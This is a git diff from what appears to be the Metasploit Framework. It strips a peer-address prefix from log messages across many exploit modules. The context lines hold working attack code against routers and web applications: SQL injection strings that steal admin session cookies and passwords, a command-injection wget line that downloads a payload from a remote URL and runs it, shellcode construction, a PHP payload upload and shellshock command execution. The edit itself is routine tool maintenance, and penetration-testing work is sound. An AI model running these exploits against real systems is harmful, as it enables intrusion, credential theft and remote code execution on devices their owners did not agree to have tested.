++-- .../http/efs_easychatserver_username.rb | 10 ++-- .../windows/http/efs_fmws_userid_bof.rb | 12 ++--- .../windows/http/ericom_access_now_bof.rb | 2 +- .../http/generic_http_dll_injection.rb | 2 +- .../http/hp_autopass_license_traversal.rb | 8 +-- .../windows/http/hp_imc_bims_upload.rb | 6 +-- .../windows/http/hp_imc_mibfileupload.rb | 6 +-- .../http/hp_loadrunner_copyfiletoserver.rb | 34 ++++++------- .../exploits/windows/http/hp_mpa_job_acct.rb | 10 ++-- .../http/hp_pcm_snac_update_certificates.rb | 6 +-- .../windows/http/hp_pcm_snac_update_domain.rb | 6 +-- .../windows/http/hp_sitescope_dns_tool.rb | 10 ++-- .../http/hp_sitescope_runomagentcommand.rb | 2 +- .../windows/http/jira_collector_traversal.rb | 14 +++--- .../exploits/windows/http/kaseya_uploader.rb | 4 +- .../http/kaseya_uploadimage_file_upload.rb | 6 +-- .../landesk_thinkmanagement_upload_asp.rb | 18 +++---- .../http/lexmark_markvision_gfd_upload.rb | 14 +++--- .../http/manage_engine_opmanager_rce.rb | 14 +++--- .../windows/http/miniweb_upload_wbem.rb | 6 +-- .../exploits/windows/http/novell_mdm_lfi.rb | 14 +++--- .../windows/http/oracle_btm_writetofile.rb | 20 ++++---- .../windows/http/oracle_endeca_exec.rb | 4 +- .../http/oracle_event_processing_upload.rb | 8 +-- .../exploits/windows/http/rejetto_hfs_exec.rb | 2 +- .../windows/http/sap_host_control_cmd_exec.rb | 12 ++--- .../windows/http/sepm_auth_bypass_rce.rb | 8 +-- .../http/sonicwall_scrutinizer_sqli.rb | 8 +-- .../windows/http/trackit_file_upload.rb | 6 +-- .../windows/http/umbraco_upload_aspx.rb | 32 ++++++------ .../http/vmware_vcenter_chargeback_upload.rb | 14 +++--- .../windows/misc/bigant_server_dupf_upload.rb | 12 ++--- .../windows/misc/hp_dataprotector_cmd_exec.rb | 4 +- .../windows/misc/hp_dataprotector_exec_bar.rb | 4 +- .../misc/hp_dataprotector_traversal.rb | 6 +-- .../misc/hp_operations_agent_coda_34.rb | 10 ++-- .../misc/hp_operations_agent_coda_8c.rb | 10 ++-- .../misc/ibm_director_cim_dllinject.rb | 6 +-- .../manageengine_eventlog_analyzer_rce.rb | 18 +++---- .../windows/misc/ms10_104_sharepoint.rb | 14 +++--- .../windows/misc/sap_netweaver_dispatcher.rb | 6 +-- ...dworks_workgroup_pdmwservice_file_write.rb | 16 +++--- modules/exploits/windows/mysql/mysql_mof.rb | 14 +++--- .../exploits/windows/mysql/mysql_start_up.rb | 4 +- .../novell/file_reporter_fsfui_upload.rb | 8 +-- .../scada/ge_proficy_cimplicity_gefebt.rb | 8 +-- modules/exploits/windows/smb/psexec.rb | 2 +- modules/exploits/windows/smb/psexec_psh.rb | 2 +- 236 files changed, 1400 insertions(+), 1400 deletions(-) diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index 4bd783ad7b..b204008a4a 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - print_status("#{peer} - Sending soap request...") + print_status("Sending soap request...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index d6236e994b..ed93ca2559 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def cmd_exec(session, cmd) case session.type when /meterpreter/ - print_warning("#{peer} - Use a shell payload in order to get root!") + print_warning("Use a shell payload in order to get root!") when /shell/ o = session.shell_command_token(cmd) o.chomp! if o @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote @dropped_elf = rand_text_alpha(rand(5) + 3) command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(command) if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/ register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf)) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};" command << File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") exec_command(command, 1) end diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index 54a1b3bd45..cfc944d929 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -68,19 +68,19 @@ class Metasploit4 < Msf::Exploit::Remote 'uri' => '/cgi-bin/ping.sh' ) if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ - vprint_status("#{peer} - Found Boa version #{$1}") + vprint_status("Found Boa version #{$1}") else - print_status("#{peer} - Target is not a Boa web server") + print_status("Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping statistics') return Exploit::CheckCode::Detected else - vprint_error("#{peer} - Target does not appear to be an Advantech switch") + vprint_error("Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote # def exploit cmd = cve_2014_6271(payload.encoded) - vprint_status("#{peer} - Trying to run command '#{cmd}'") + vprint_status("Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index 42232de7a8..a64e532d2a 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 343ff95190..0805c4f7c4 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" - print_status("#{peer} - Trying to grab admin session through SQLi") + print_status("Trying to grab admin session through SQLi") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ admin_session = $1 @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") - print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") + print_status("Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") end @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Action [ #{action} ]") + print_status("Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ @action_id = $1 - print_status("#{peer} - Action ID is [ #{@action_id} ]") + print_status("Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ policy_ctx = $1 policy_group = $2 - print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") + print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Policy [ #{policy} ]") + print_status("Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") end @@ -237,13 +237,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ @policy_id = $1 - print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") + print_status("Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -255,14 +255,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. dont_exist = rand_text_alpha(8+rand(4)) - print_status("#{peer} - Triggering policy and action by requesting a non existing url") + print_status("Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, dont_exist), @@ -270,7 +270,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 404 - print_status("#{peer} - Payload delivered") + print_status("Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") end @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup begin # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") + print_status("Cleaning up") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), @@ -291,9 +291,9 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else - print_warning("#{peer} - Unable to retrieve token") + print_warning("Unable to retrieve token") end # Remove our policy @@ -309,9 +309,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + print_status("Policy ID [ #{@policy_id} ] removed") else - print_warning("#{peer} - Unable to remove Policy ID") + print_warning("Unable to remove Policy ID") end # Remove our action @@ -325,13 +325,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Action ID [ #{@action_id} ] removed") + print_status("Action ID [ #{@action_id} ] removed") else - print_warning("#{peer} - Unable to remove Action ID") + print_warning("Unable to remove Action ID") end # Reload the policies to revert back to the state before exploitation - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index a721d59af2..e08ec2ccf0 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect Astium") + vprint_status("Trying to detect Astium") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri), @@ -82,16 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/ session = $1 - print_good("#{peer} - Session cookie is [ #{session} ]") + print_good("Session cookie is [ #{session} ]") redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET', @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote pass = rand_text_alphanumeric(10) post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login" - print_status("#{peer} - Using SQLi to bypass authentication") + print_status("Using SQLi to bypass authentication") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "/en", "logon.php"), @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"") file = post_data.to_s - print_status("#{peer} - Uploading Payload [ #{payload_name} ]") + print_status("Uploading Payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "en", "database", "import.php"), @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}") - print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]") - print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes") + print_status("Requesting Payload [ #{uri}upload/#{payload_name} ]") + print_status("Waiting as the reloading process may take some time, this may take a couple of minutes") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "upload", "#{payload_name}") @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response...") + print_error("Unexpected response...") end end diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 2994ce4a32..7ead5ddb5a 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb +++ b/modules/exploits/linux/http/belkin_login_bof.rb @@ -78,13 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200 diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 417e2e6d14..3ed353e001 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") random_id = rand_text_numeric(5 + rand(8)) random_char = rand_text_alphanumeric(1) session_injection = "#{random_id}' or '#{random_char}'='#{random_char}" diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index e345dc28a1..d0fe19aec3 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -74,13 +74,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index bca4beed87..1fb8bbaf5e 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -72,15 +72,15 @@ class Metasploit4 < Msf::Exploit::Remote )) unless res - vprint_status("#{peer} - The connection timed out.") + vprint_status("The connection timed out.") return Exploit::CheckCode::Unknown end if res.code && res.code == 404 - vprint_status("#{peer} - uploadfile.htm does not exist") + vprint_status("uploadfile.htm does not exist") return Exploit::CheckCode::Safe elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/ return Exploit::CheckCode::Vulnerable @@ -101,7 +101,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Payload uploaded successfully") + print_good("Payload uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") end @@ -117,7 +117,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Stager uploaded successfully") + print_good("Stager uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager") end @@ -140,7 +140,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 401 fail_with(Failure::NoAccess, "#{peer} - Authentication failed") elsif res.code && res.code == 200 && res.body - print_good("#{peer} - Payload executed successfully") + print_good("Payload executed successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed") end @@ -169,9 +169,9 @@ rm -f /tmp/tmpchpw EOF res = upload('/sbin/chpasswd.sh', chpasswd) if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully") + vprint_good("Restored /sbin/chpasswd.sh successfully") else - vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default") + vprint_warning("Could not restore /sbin/chpasswd.sh to default") end end @@ -179,7 +179,7 @@ EOF # Upload a file to a specified path # def upload(path, data) - vprint_status("#{peer} - Writing #{data.length} bytes to #{path}") + vprint_status("Writing #{data.length} bytes to #{path}") boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 14d871d2b0..314bc380bd 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote shellcode << rand_text(0x1c) # filler shellcode << payload.encoded # shellcode - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index 66ea232ee9..84e8fbe741 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb +++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -73,20 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") @counter = 1 execute_cmdstager( :flavor => :echo, :linemax => 95 # limited by our upload, larger payloads crash the web server ) - print_status("#{peer} - creating payload and executing it ...") + print_status("creating payload and executing it ...") (1 .. @counter).each do |act_file| # the http server blocks access to our files ... we copy it to a new one diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 2fe19360ba..914ba26974 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index e455b14a64..ef34cda681 100644 --- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 62f500e8eb..70967ebe23 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index 0f001df572..0d747ee3b8 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index fc89dd0e39..df5eab20f3 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 1513892d77..5478e1f05c 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -117,26 +117,26 @@ class Metasploit3 < Msf::Exploit::Remote @uri.path << "/" if @uri.path[-1, 1] != "/" peer = "#{rhost}:#{rport}" - print_status("#{peer} - Getting the sid and token...") + print_status("Getting the sid and token...") sid, token = get_sid_token if sid.nil? - print_error("#{peer} - Unable to retrieve a session ID") + print_error("Unable to retrieve a session ID") return elsif token.nil? - print_error("#{peer} - Unable to retrieve a token") + print_error("Unable to retrieve a token") return end user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with \"#{user}:#{pass}\"") + print_status("Attempt to login with \"#{user}:#{pass}\"") success = login(sid, token) if not success - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@uri.path, "admin/tools/export.php"), diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index de1a4d8942..86c03e5227 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'GET', 'uri' => "/cgi-bin/learn-msg.cgi", @@ -84,12 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably something is wrong if not res or res.code != 200 or res.body !~ /meta http-equiv="refresh" content="0;URL=\/learned.html"/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end - print_good("#{peer} - Command executed successfully") - print_status("#{peer} - Output: \n#{res.body.split("Learned tokens")[0]}") + print_good("Command executed successfully") + print_status("Output: \n#{res.body.split("Learned tokens")[0]}") end end diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index acb764be06..da57034a85 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -101,13 +101,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( flavor: :echo, linemax: 92 diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index a7ca3d7d9b..f3a9285a0b 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -115,14 +115,14 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") @josso_id = get_josso_token if @josso_id.nil? fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") end - print_good("#{peer} - Authentication successful") + print_good("Authentication successful") - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") execute_command(payload.encoded) end end diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index e3c2a9b4a8..d1911a1fd9 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") unless check == Exploit::CheckCode::Vulnerable - print_status("#{peer} - Recovering the admin password with SQLi...") + print_status("Recovering the admin password with SQLi...") loot = base64_password fail_with(Failure::Unknown, "#{peer} - Failed to exploit the SQLi...") if loot.nil? @password = Rex::Text.decode_base64(loot) - print_good("#{peer} - Password recovered: #{@password}") + print_good("Password recovered: #{@password}") - print_status("#{peer} - Logging into the Control Panel...") + print_status("Logging into the Control Panel...") @session = send_login fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil? @@ -130,11 +130,11 @@ class Metasploit3 < Msf::Exploit::Remote attempt_time: DateTime.now ) - print_status("#{peer} - Retrieving the server name...") + print_status("Retrieving the server name...") @server = server_info fail_with(Failure::NoAccess, "#{peer} - Login with 